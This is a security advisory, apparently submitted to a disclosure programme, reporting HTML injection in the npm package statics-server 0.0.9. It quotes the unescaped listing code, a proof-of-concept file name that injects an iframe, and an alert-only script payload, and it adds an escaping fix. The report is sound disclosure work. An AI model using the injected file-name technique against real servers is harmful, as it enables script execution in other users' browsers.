Hi Team,
I would like to report an HTML injection in the statics-server module. It is possible to inject a malicious iframe tag via a filename and execute arbitrary JavaScript code.
module name: statics-server
version: 0.0.9
npm page: https://www.npmjs.com/package/statics-server
usage: npm install statics-server -g, go to the folder you want to serve, run statics-server
downloads: ~80-100/month
statics-server does not implement any HTML escaping when it displays the directory index in the browser. The variable v is used in the <a href> element without escaping, which allows embedding an HTML <iframe> tag whose src attribute points to another HTML file in the directory. That file can contain malicious JavaScript code, which will be executed:
// ./node_modules/statics-server/index.js, line 18 (version 0.0.9):
// each entry name v is concatenated into the listing without escaping
if (fs.lstatSync(staticPath).isDirectory()) {
  var files = fs.readdirSync(staticPath);
  var lis = '';
  files.forEach((v, i) => {
    if (fs.lstatSync(path.resolve(staticPath, v)).isDirectory()) {
      lis += `<li><a href>${v}/</a></li>`;
    } else {
      lis += `<li><a href>${v}</a></li>`;
    }
  });
  (...)
Steps to reproduce:
1. Install the statics-server module:
$ npm install statics-server
2. In the served folder, create a file named "><iframe src="malware_frame.html"> and a malware_frame.html file with the following content:
<html>
  <head>
    <meta charset="utf8" />
    <title>Frame embedded with malware :P</title>
  </head>
  <body>
    <p>iframe element with malicious code</p>
    <script>
      alert('Uh oh, I am bad, bad malware!!!')
    </script>
  </body>
</html>
3. Run statics-server:
$ ./node_modules/statics-server/index.js
服务器已经启动
访问localhost:8080
4. Open http://localhost:8080 in the browser.
You see the JavaScript from malware_frame.html executed immediately (screenshot attached to the report).
The v variable in the provided code fragment should be HTML-escaped before it is sent back to the browser.
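As an added illustration (not code from statics-server or from the reporter), the listing loop from the report next to a version that escapes v; the escape helper, the {name, isDirectory} entry shape and the sample names are assumptions of this example:

```javascript
// Added example, not code from statics-server: the report's directory-index
// rendering beside a hardened version that escapes each file name.
// Entries are plain {name, isDirectory} objects so this runs without
// touching the filesystem.

// Escape the characters that are significant in HTML text and attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern from the report: the name is placed into the markup as-is.
function renderIndexUnsafe(entries) {
  let lis = '';
  for (const e of entries) {
    const label = e.isDirectory ? `${e.name}/` : e.name;
    lis += `<li><a href>${label}</a></li>`;
  }
  return `<ul>${lis}</ul>`;
}

// Hardened version: escape the name for the text node and percent-encode it
// for the href attribute (the original leaves href empty).
function renderIndexSafe(entries) {
  let lis = '';
  for (const e of entries) {
    const label = e.isDirectory ? `${e.name}/` : e.name;
    const href = encodeURIComponent(e.name) + (e.isDirectory ? '/' : '');
    lis += `<li><a href="${href}">${escapeHtml(label)}</a></li>`;
  }
  return `<ul>${lis}</ul>`;
}

// True if the rendered HTML still contains a raw <iframe tag.
function containsRawIframe(html) {
  return /<iframe\b/i.test(html);
}

// Constructed sample listing that includes the file name from the report.
const SAMPLE_ENTRIES = [
  { name: 'index.html', isDirectory: false },
  { name: 'docs', isDirectory: true },
  { name: '"><iframe src="malware_frame.html">', isDirectory: false },
];
```

Running containsRawIframe over both renderings of SAMPLE_ENTRIES shows the unsafe listing carries a live iframe while the escaped one displays the name as text.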
Regards,
Rafal "bl4de" Janicki
An attacker is able to execute malicious JavaScript in the context of another user's browser.